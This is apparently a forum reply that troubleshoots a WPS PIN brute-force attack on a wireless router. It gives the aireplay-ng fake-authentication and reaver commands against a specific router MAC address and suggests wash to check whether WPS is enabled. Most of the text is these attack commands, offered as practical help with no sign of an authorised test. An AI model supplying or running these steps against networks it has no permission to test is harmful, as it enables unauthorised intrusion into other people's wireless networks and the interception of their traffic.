Did you try associating with aireplay from another console window ?
iwconfig mon0 channel 8
aireplay-ng mon0 -1 120 -a E8:39:DF:2E:79:EA
in new console window
reaver -i mon0 -b E8:39:DF:2E:79:EA -vv -A
also try using -w -n -N -S and other commands with reaver
type reaver -h for help with those other commands if needed

Any issues in regards to halting on the association is probably to do with WPS
not being enabled on the router or not even existing on the router. Be sure to
use the wash -i mon0 command to see if your router shows up on the list, if
not, it is likely the WPS is not enabled or your router does not support WPS.
